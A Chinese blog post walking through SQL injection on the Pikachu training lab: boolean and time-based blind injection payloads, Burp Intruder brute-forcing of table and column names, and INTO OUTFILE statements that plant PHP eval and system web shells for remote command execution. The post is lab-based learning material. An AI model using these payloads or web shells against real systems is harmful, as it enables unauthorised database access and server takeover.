pikachu注入漏洞演示3

本文深入探讨了SQL注入攻击中的盲注技术,包括基于真假和基于时间的盲注方法。介绍了如何利用这些技术来获取数据库信息,例如数据库名称、表名和列名等,并展示了如何通过SQL注入实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sql-inject 漏洞-盲注
盲注:
在这里插入图片描述
基于真假的盲注
在这里插入图片描述
先用字符串测试一下
在这里插入图片描述
发现不行
在这里插入图片描述
再试试
在这里插入图片描述
在这里插入图片描述
因为kobe存在,and 1=1为真 所以被写入后台,所以存在sql注入
用之前基于报错的payload来试一下
kobe’ and extractvalue(0,concat(0x7e,version()))#
不行
在这里插入图片描述
在这里插入图片描述
获取数据库名称,取第一个字符转成ascii码,转成ascii码之后就可以对他进行运算
在这里插入图片描述
在这里插入图片描述

要转换成真和假,因为 在基于真假的sql注入里面,所有从前段看到的只有两种情况,要么是真,要么是假,所以payload传到后台的时候得出来的结果一定要是真或假两种情况,从前段才可以做对的判断,否则做不了判断。看我们传进去的database的payload对应的结果返回的数据库长度是多少 是7个字符
在这里插入图片描述
kobe’ and ascii(substr(database(),1,1))>113#

如果返回了kobe对应的信息,意味着and后面的表达式为真,反之为假。基于真假就能知道database第一个字符串是不是>113。
提示不存在
在这里插入图片描述
改一下
kobe’ and ascii(substr(database(),1,1))=112#
显示出来了kobe的信息
在这里插入图片描述
(select table_name from information_schema.tables where table_schema=database() limit 0,1) 把这个payload替换database

kobe’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<112#

返回皮卡丘当前数据库第一个表的名称
在这里插入图片描述
盲注-base on time 的盲注案例演示
在这里插入图片描述
用暂停5秒试一下
kobe’ and sleep(5)#
把我们输入的payload执行了,说明这块存在sql注入,并且是基于时间的盲注
在这里插入图片描述
根据时间的延迟来做判断
用 if 做判断,通过 database 把数据库名称取出来,通过 substr 把数据库第一个字符取出来,和 p 作比较,如果等于p 则暂停5秒钟。

kobe’ and if((substr(databese(),1,1))=‘p’,sleep(5),null)#
通过sql 进行服务器的远程控制案例测试
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
一句话木马写到select字段里面,<?php @eval($_GET[' test '])?>

outfile:把select出来的两个字段写到后面指定的文件中去。

kobe’ union select “<?php @eval($_GET['test'])?>”,2 into outfile “/var/www/html/1.php”#

执行访问一下 传一个phpinfo() 赋值给text 最终被eval执行
通过链接可以执行任意php代码
在这里插入图片描述
看一下远程操作系统命令执行
system是php下用来执行操作系统的函数
kobe’ union select “<?php @system($_GET['cmd'])?>”,2 into outfile “/var/www/html/2.php”#

会把当前目录相关的文件列出来
在这里插入图片描述
得到 IP地址和服务器
在这里插入图片描述
暴力破解在sql漏洞中的应用

kobe’ and exists(select * from aa)#
aa是我们猜测的部分 aa是一个字典
试一下
在这里插入图片描述
把抓到的包发送到intruder
把其他的都clear掉 只add aa
在这里插入图片描述
写几个payload试一下
在这里插入图片描述
在这里插入图片描述
猜出数据库表的名字
在这里插入图片描述
下面猜列的名字
kobe’ and exists(select id from users)#

试一下
在这里插入图片描述
把数据包抓下来 发送到 intruder 对id 字段进行爆破
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值